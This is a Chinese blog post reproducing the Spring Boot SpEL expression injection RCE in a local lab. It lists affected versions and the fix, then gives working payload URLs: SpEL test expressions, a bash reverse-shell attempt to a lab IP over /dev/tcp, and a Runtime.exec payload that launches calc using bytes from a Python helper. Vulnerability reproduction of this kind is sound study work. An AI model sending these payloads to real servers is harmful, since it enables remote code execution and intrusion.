springboot_spEL表达式注入

最新推荐文章于 2024-05-23 19:08:02 发布
最新推荐文章于 2024-05-23 19:08:02 发布
阅读量1.9k 收藏 2
点赞数
分类专栏: 安全测试:web\app\工具 文章标签: jar
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43650289/article/details/107336833
版权

目录

linux 【centos7 x64】

windows 7 32位

影响版本:

1.1.0-1.1.12
1.2.0-1.2.7
1.3.0
修复方案:升至1.3.1或以上版本
我的测试环境:SpringBoot 1.0

简介

Spring Expression Language是一种强大的表达式语言,Spring开发中经常会用到。正是因为功能强大,导致在某些情况下,用户可以从外部注入SpEl表达,导致命令执行。

原理

  • spring boot 处理参数值出错,流程进入 org.springframework.util.PropertyPlaceholderHelper 类中
  • 此时 URL 中的参数值会用 parseStringValue 方法进行递归解析。
  • 其中 ${} 包围的内容都会被 org.springframework.boot.autoconfigure.web.ErrorMvcAutoConfiguration 类的 resolvePlaceholder 方法当作 SpEL 表达式被解析执行,造成 RCE 漏洞。
     

linux 【centos7 x64】

[root@localhost ~]# docker pull c1o2a3/springboot_spel_rce_bug:1.0
[root@localhost ~]# sudo docker run -d -p 9091:9091 c1o2a3/springboot_spel_rce_bug:1.0


http://192.168.18.131:9091/article?id=1

http://192.168.18.131:9091/article?id=${20/4}

直接使用反弹shell----不可以

http://192.168.18.131:9091/article?id=${bash%20-i%20%3E&%20/dev/tcp/192.168.18.168/443%200%3E&1}

 

windows 7 32位

jar包的需要jre1.8环境运行

https://www.oracle.com/java/technologies/javase-jre8-downloads.html

 springboot-spel-rce-1.0-SNAPSHOT.jar  上网搜索下载

http://192.168.18.129:9091/article?id=1

http://192.168.18.129:9091/article?id=${40*5} 

 




# coding: utf-8

result = ""
target = 'calc'
for x in target:
    result += hex(ord(x)) + ","
print(result.rstrip(','))


root@kali:~# python vb.py
0x63,0x61,0x6c,0x63

http://192.168.18.129:9091/article?id=${T(java.lang.Runtime).getRuntime().exec(new%20String(new%20byte[]{0x63,0x61,0x6c,0x63}))}

战神/calmness
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Spring高手之路3——揭秘Spring依赖注入SpEL表达式
卓越无关环境,保持空杯心态——靡不有初,鲜克有终
06-06 6390
在本文中,我们深入探讨了Spring框架中的属性注入技术,包括setter注入、构造器注入、注解式属性注入,以及使用SpEL表达式进行属性注入。我们通过XML和注解两种方式,详细讲解了如何进行属性注入,并给出了完整的代码示例。无论你是Spring新手,还是有一定经验的开发者,本文都将帮助你理解并掌握Spring中的属性注入技术。
SpringBoot属性注入
qq_41931364的博客
02-06 1054
SpringBoot属性注入1、通过application.yml和@Value进行注入2、通过ConfigurationProperties在实体类上注解注入属性值3、设置application.yml配置文件中的提示4、application.yml里面可以设置占位符4.1、可以引用其它属性4.2、使用随机数5、配合ConfigurationProperties注解实现jsr-303数据校验6、@ConfigurationProperties注解和@Value的区别7、指定外部的properties文件
Spring框架中Spel表达式解析器:SpelExpressionParser
最新发布
weixin_67727883的博客
05-23 310
Spring框架中Spel表达式解析器:SpelExpressionParser
揭秘Spring依赖注入SpEL表达式
程序猿DD
06-14 169
来源| OSCHINA 社区作者 |华为云开发者联盟-砖业洋_原文链接:https://my.oschina.net/u/4526289/blog/10023664在本文中,我们深入探讨了 Spring 框架中的属性注入技术,包括 setter 注入、构造器注入、注解式属性注入,以及使用 SpEL 表达式进行属性注入。我们通过 XML 和注解两种方式,详细讲解了如何进行属性注入,并给出了完整的...
springboot的四种注入方式
m0_67401545的博客
04-26 5159
springboot的属性注入注入dataSource为例 1.springboot默认读取的文件是放在resources目录下的名为application.properties或application.yml的文件 在application.properties中写入以下属性 jdbc.driverClassName=com.mysql.jdbc.Driver jdbc.url=jdbc:mysql://127.0.0.1:3306/数据库名称 jdbc.username=rootxxx jdbc.p
SpringBoot技术实践-SpEL&EL表达式
TianXinCoord的博客
07-23 3036
一、SpringEL-基础介绍 什么是SpringEL(SpEL)? Spring3中引入了Spring表达式语言—SpringEL,SpEL是一种强大,简洁的装配Bean的方式 SpringEL可以通过运行期间执行的表达式将值装配到我们的属性或构造函数当中 SpringEL可以调用JDK中提供的静态常量,获取外部Properties文件中的的配置 为什么要使用SpringEL? 平常通过配置文件或Annotaton注入的Bean,其实都可以称为静态性注入 如Bean A中有变量A,它的值需要根据
springEL表达式详解及应用
热门推荐
青鱼入云的博客
05-10 5万+
什么是SpringEL? Spring3中引入了Spring表达式语言—SpringEL,SpEL是一种强大,简洁的装配Bean的方式,他可以通过运行期间执行的表达式将值装配到我们的属性或构造函数当中,更可以调用JDK中提供的静态常量,获取外部Properties文件中的的配置 为什么要使用SpringEL? 我们平常通过配置文件或Annotaton注入的Bean,其实都可以称为静态...
my_springboot_01.rar
02-24
总的来说,"my_springboot_01.rar"压缩包中的内容可能涵盖了SpringBoot框架中集合类型配置的高级用法,包括但不限于自定义转换器、SpEL表达式、条件注解等。通过对这些知识点的学习和实践,开发者可以更加熟练地驾驭...
springboot_properties
01-09
7. **SpEL表达式** Spring Expression Language (SpEL)可以在配置中使用,允许动态计算值。例如,`spring.jpa.hibernate.ddl-auto=${db.ddl.strategy}`,其中`db.ddl.strategy`是环境变量或系统属性。 8. **多语言...
详解SpringBoot注入数据的方式
08-26
三、使用SpEL表达式注入数据 SpEL(Spring Expression Language)是Spring框架提供的一种表达式语言,可以用于注入数据。例如,使用SpEL表达式注入随机数: ```java @Component public class SimpleObject { @...
SpringBoot 配置国际化完整源码
02-16
Spring Expression Language (SpEL)也可以在Java代码中表达式`#{message.key}`来获取。 5. **Maven配置**: `pom.xml`文件中的`maven-resources-plugin`插件用于处理资源文件,确保它们在构建过程中被正确复制到...
springboot-config01配置
02-20
它可以从`application.properties`或`application.yml`文件中读取值,也可以使用SpEL(Spring Expression Language)表达式。 3. `@PropertySource`: 这个注解用于指定属性源,通常是从外部的properties文件中...
记录SpringEL表达式中的 ${}和#{}的区别
qq_38181949的博客
08-27 3828
一、${} ${} 用于加载外部文件指定的Key值,常用在xml中,@Value(" ${key_value}") 二、#{} #{} 功能比 ${} 功能更强大,强调的是把内容赋值给属性,示例: 表示常量: #{‘1’} ,#{’ This is a Constant Str’} 使用java代码new/instance of: 此方法只能是java.lang 下的类才可以省略包名 #{“new Spring(‘Hello World’)”} 使用T(Type): 使用“T(Type)”来表示java.
SpringBoot 读取配置文件汇总
不疯魔不成活,分享技术,享受生活
09-24 292
1、使用注解@ConfigurationProperties映射 通过注解@ConfigurationProperties(prefix=“配置文件中的key的前缀”)可以将配置文件中的配置自动与实体进行映射application.properties配置 2、使用注解Value("${key}")映射 可以通过@Value注解将配置文件中的值映射到一个Spring管理的Bean的字段上。 3、使用注解@PropertySource("classpath:xxx.properties")加载自定义属
Spring Cloud Function SPEL表达式注入漏洞复现】
xhwfa的博客
04-20 3552
漏洞编号:CVE-2022-22963 一、漏洞简述 Spring Cloud Function 是基于Spring Boot的函数计算框架(FaaS),该项目提供了一个通用的模型,用于在各种平台上部署基于函数的软件,包括像Amazon AWS Lambda 这样的 FaaS(函数即服务,function as a service)平台。它抽象出所有传输细节和基础架构,允许开发人员保留所有熟悉的工具和流程,并专注于业务逻辑。 在版本3.0.0到当前最新版本3.2.2(commit dc5128b),默
Spring AOP 在注解上使用SPEL表达式注入对象
c17315377559的博客
12-02 1117
场景描述 在平时开发中,我们经常通过定义一些注解,进行轻量级开发。今天主要研究的内容是关于如何在注解上通过spel表达式注入对象,以此调用注入对象的具体业务处理逻辑,然后在通过对表达式的解析,进而获取该业务逻辑处理的结果,类似于Spring Security中的@PreAuthorize, @PreAuthorize, @PostAuthorize等注解,本次场景案例以模仿@PreAuthorize注解进行分析。 具体案例 定义@SpelPreAuthorize注解,对标@PreAuthorize @Tar
Spring Cloud Function SpEL表达式注入漏洞分析
include_voidmain的博客
04-06 1961
0x01 影响版本 V3.0.0.M3 - V3.2.2 0x02 漏洞分析 使用该环境进行测试: https://github.com/jwwam/scfunc -依赖版本改成3.2.2查看修复的记录 https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f 看到设置了一个isViaHeader,通过它的值来选择是使用 SimpleEvaluationCont
SpringBoot使用自定义注解对方法进行AOP切面,从请求的Request中使用SPEL从请求的Request中获取请求的对象中的某一个列表进行get和set操作
qq_41625866的博客
07-19 2037
SpringBoot使用自定义注解对方法进行AOP切面,从请求的Request中使用SPEL从请求的Request中获取请求的对象中的某一个列表进行get和set操作
Spring Boot框架表达式注入漏洞
weixin_34244102的博客
07-14 759
2019独角兽企业重金招聘Python工程师标准>>> ...
SpringBoot SpEL表达式注入漏洞-分析与复现
06-02
SpringBoot SpEL表达式注入漏洞是一种常见的安全漏洞,攻击者可以利用该漏洞在应用中执行恶意代码,从而导致应用被攻击。下面我将对该漏洞进行分析与复现。 一、漏洞分析 SpringBoot中的SpEL(Spring Expression ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

战神/calmness

你的鼓励是我最大的动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值